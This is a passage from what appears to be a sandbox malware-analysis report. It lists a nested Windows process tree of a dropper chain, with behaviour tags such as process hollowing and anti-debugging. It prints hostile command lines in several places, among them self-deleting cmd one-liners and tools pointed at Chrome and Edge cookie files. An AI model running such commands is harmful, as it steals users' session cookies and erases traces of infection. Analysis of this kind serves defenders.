                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                        PID:10612
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\nT753VUnP8uCrnjIkmcQFiTv.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\nT753VUnP8uCrnjIkmcQFiTv.exe"
                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  PID:5332
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\okcf6_kbZYKfkBmtk9_4Dg5R.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\okcf6_kbZYKfkBmtk9_4Dg5R.exe"
                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  PID:2504
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\K9AmIoUqZd_MmtbT5cEp9i4s.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\K9AmIoUqZd_MmtbT5cEp9i4s.exe"
                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:10136
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\K9AmIoUqZd_MmtbT5cEp9i4s.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\K9AmIoUqZd_MmtbT5cEp9i4s.exe
                                                                                                                                                                                                                                                    25⤵
                                                                                                                                                                                                                                                      PID:7888
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\xYQyIrMDmMF49DKsllEbovkc.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\xYQyIrMDmMF49DKsllEbovkc.exe"
                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                    PID:4992
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe"
                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                    PID:5352
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe
                                                                                                                                                                                                                                                      25⤵
                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                      PID:9776
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 7xaAXt_dkjsczFKhVZaAReDY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                          PID:8992
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                            taskkill /im 7xaAXt_dkjsczFKhVZaAReDY.exe /f
                                                                                                                                                                                                                                                            27⤵
                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                            PID:9472
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                                                                                            27⤵
                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                            PID:3940
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe
                                                                                                                                                                                                                                                        25⤵
                                                                                                                                                                                                                                                          PID:9700
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\mxsw_SF3dUvPALDk3a70KUTD.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\mxsw_SF3dUvPALDk3a70KUTD.exe"
                                                                                                                                                                                                                                                        24⤵
                                                                                                                                                                                                                                                          PID:10160
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\mxsw_SF3dUvPALDk3a70KUTD.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\mxsw_SF3dUvPALDk3a70KUTD.exe"
                                                                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                            PID:8476
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe"
                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                          PID:2832
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
                                                                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                                                                              PID:10716
                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
                                                                                                                                                                                                                                                              25⤵
                                                                                                                                                                                                                                                                PID:11144
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
                                                                                                                                                                                                                                                                25⤵
                                                                                                                                                                                                                                                                  PID:9368
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe"
                                                                                                                                                                                                                                                                24⤵
                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                PID:9164
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
                                                                                                                                                                                                                                                                  25⤵
                                                                                                                                                                                                                                                                    PID:10760
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
                                                                                                                                                                                                                                                                    25⤵
                                                                                                                                                                                                                                                                      PID:11180
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
                                                                                                                                                                                                                                                                      25⤵
                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                      PID:8580
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
                                                                                                                                                                                                                                                                      25⤵
                                                                                                                                                                                                                                                                        PID:10380
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\ki3_KZPy8mayW3fL7_9K9qcV.exe
                                                                                                                                                                                                                                                                        25⤵
                                                                                                                                                                                                                                                                          PID:7328
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\zZUQe0xhiqeCB8MfIsGDRvq_.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\zZUQe0xhiqeCB8MfIsGDRvq_.exe"
                                                                                                                                                                                                                                                                        24⤵
                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                        PID:10004
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\zZUQe0xhiqeCB8MfIsGDRvq_.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\zZUQe0xhiqeCB8MfIsGDRvq_.exe
                                                                                                                                                                                                                                                                          25⤵
                                                                                                                                                                                                                                                                            PID:10696
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\PadoXcwVnD4LB1m1Nl31Ar9T.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\PadoXcwVnD4LB1m1Nl31Ar9T.exe"
                                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                                            PID:10224
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\8421563.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\8421563.exe"
                                                                                                                                                                                                                                                                              25⤵
                                                                                                                                                                                                                                                                                PID:10332
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\LVPzrmaNzVLWfCx45Zo57SX6.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\LVPzrmaNzVLWfCx45Zo57SX6.exe"
                                                                                                                                                                                                                                                                              24⤵
                                                                                                                                                                                                                                                                                PID:3476
                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  25⤵
                                                                                                                                                                                                                                                                                    PID:8800
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\LVPzrmaNzVLWfCx45Zo57SX6.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\LVPzrmaNzVLWfCx45Zo57SX6.exe" -a
                                                                                                                                                                                                                                                                                    25⤵
                                                                                                                                                                                                                                                                                      PID:10396
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\W61gI9PcMNidYLTmkmLLmZfe.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\W61gI9PcMNidYLTmkmLLmZfe.exe"
                                                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                                                      PID:9848
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                        25⤵
                                                                                                                                                                                                                                                                                          PID:4000
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                          25⤵
                                                                                                                                                                                                                                                                                            PID:7820
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                                                                                                              PID:7028
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                              25⤵
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              PID:9276
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                              25⤵
                                                                                                                                                                                                                                                                                                PID:10612
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                25⤵
                                                                                                                                                                                                                                                                                                  PID:4852
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                  25⤵
                                                                                                                                                                                                                                                                                                    PID:9660
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                    25⤵
                                                                                                                                                                                                                                                                                                      PID:9920
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\lhzbQzLdkWniKoqfal7GhBHF.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\lhzbQzLdkWniKoqfal7GhBHF.exe"
                                                                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                                                                      PID:6932
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                                                                                                                        25⤵
                                                                                                                                                                                                                                                                                                          PID:8632
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8B1A59C7\setup_install.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zS8B1A59C7\setup_install.exe"
                                                                                                                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                            PID:10936
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                                                                                              27⤵
                                                                                                                                                                                                                                                                                                                PID:5524
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8B1A59C7\karotima_2.exe
                                                                                                                                                                                                                                                                                                                  karotima_2.exe
                                                                                                                                                                                                                                                                                                                  28⤵
                                                                                                                                                                                                                                                                                                                    PID:6880
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8B1A59C7\karotima_2.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS8B1A59C7\karotima_2.exe" -a
                                                                                                                                                                                                                                                                                                                      29⤵
                                                                                                                                                                                                                                                                                                                        PID:10228
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                                                                                                    27⤵
                                                                                                                                                                                                                                                                                                                      PID:10684
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\7ZWFwbfiv6EqrZvoX4QhnZmZ.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\7ZWFwbfiv6EqrZvoX4QhnZmZ.exe"
                                                                                                                                                                                                                                                                                                                24⤵
                                                                                                                                                                                                                                                                                                                  PID:8468
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe"
                                                                                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                  PID:6716
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\HKWciGDzZwJWnxlbqunavkBk.exe
                                                                                                                                                                                                                                                                                                                    25⤵
                                                                                                                                                                                                                                                                                                                      PID:10736
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\cTAuvVlPPSRGWXeoFXM3dUKx.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\cTAuvVlPPSRGWXeoFXM3dUKx.exe"
                                                                                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                    PID:7312
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                                                                                                                                                      25⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                      PID:10796
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                        PID:9392
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                                                                                          PID:9388
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\8H9R1sYpqF5ecWnb1JVGY43L.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\8H9R1sYpqF5ecWnb1JVGY43L.exe"
                                                                                                                                                                                                                                                                                                                      24⤵
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      PID:9116
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3213382.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3213382.exe"
                                                                                                                                                                                                                                                                                                                        25⤵
                                                                                                                                                                                                                                                                                                                          PID:10548
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3353161.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3353161.exe"
                                                                                                                                                                                                                                                                                                                          25⤵
                                                                                                                                                                                                                                                                                                                            PID:11228
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe"
                                                                                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                          PID:10348
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                            PID:3476
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                              taskkill /im HdMy6Cma6Hzl1sQ4Eoplr0Qq.exe /f
                                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                              PID:9356
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                              PID:10400
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\CBnnMYG2tH0jRk8uDhQWuLLk.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\CBnnMYG2tH0jRk8uDhQWuLLk.exe"
                                                                                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                          PID:10544
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\CBnnMYG2tH0jRk8uDhQWuLLk.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\CBnnMYG2tH0jRk8uDhQWuLLk.exe"
                                                                                                                                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                            PID:2132
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe"
                                                                                                                                                                                                                                                                                                                19⤵
                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                PID:6212
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe
                                                                                                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                                                                                                    PID:7892
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\6LtOwaCr70vwNVWdVNLr6uSF.exe
                                                                                                                                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                                                                                                                                      PID:5468
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\Gzki2vPFZ24D6So293TCKWVC.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\Gzki2vPFZ24D6So293TCKWVC.exe"
                                                                                                                                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                    PID:7088
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\Gzki2vPFZ24D6So293TCKWVC.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\Gzki2vPFZ24D6So293TCKWVC.exe
                                                                                                                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                                                                                                                        PID:9540
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\ku00Gx3L5SltbhCZ5cyC1Ko_.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\ku00Gx3L5SltbhCZ5cyC1Ko_.exe"
                                                                                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                      PID:4756
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\uL6morXuH1gwxChLdnZUGRhX.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\uL6morXuH1gwxChLdnZUGRhX.exe"
                                                                                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                      PID:7436
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\uL6morXuH1gwxChLdnZUGRhX.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\uL6morXuH1gwxChLdnZUGRhX.exe
                                                                                                                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                                                                                                                          PID:10432
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\rEYjqk2DCXbD04znqw7_lUTq.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\rEYjqk2DCXbD04znqw7_lUTq.exe"
                                                                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                        PID:10180
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\kXiMTHrHNAq5rAhBTHtEmG9A.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\kXiMTHrHNAq5rAhBTHtEmG9A.exe"
                                                                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                                                                          PID:8520
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\4754634.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\4754634.exe"
                                                                                                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                                                                                                              PID:8240
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\Ax0mC2NZC04LSQSiW0hapBj7.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\Ax0mC2NZC04LSQSiW0hapBj7.exe"
                                                                                                                                                                                                                                                                                                                            19⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                            PID:6848
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\Ax0mC2NZC04LSQSiW0hapBj7.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\Ax0mC2NZC04LSQSiW0hapBj7.exe"
                                                                                                                                                                                                                                                                                                                              20⤵
                                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                              PID:9328
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\w0r92Fdo8l3RBiKXLLeV1zjH.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\w0r92Fdo8l3RBiKXLLeV1zjH.exe"
                                                                                                                                                                                                                                                                                                                            19⤵
                                                                                                                                                                                                                                                                                                                              PID:4948
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                20⤵
                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                PID:9560
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                20⤵
                                                                                                                                                                                                                                                                                                                                  PID:5404
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                                                                                                                    PID:10164
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
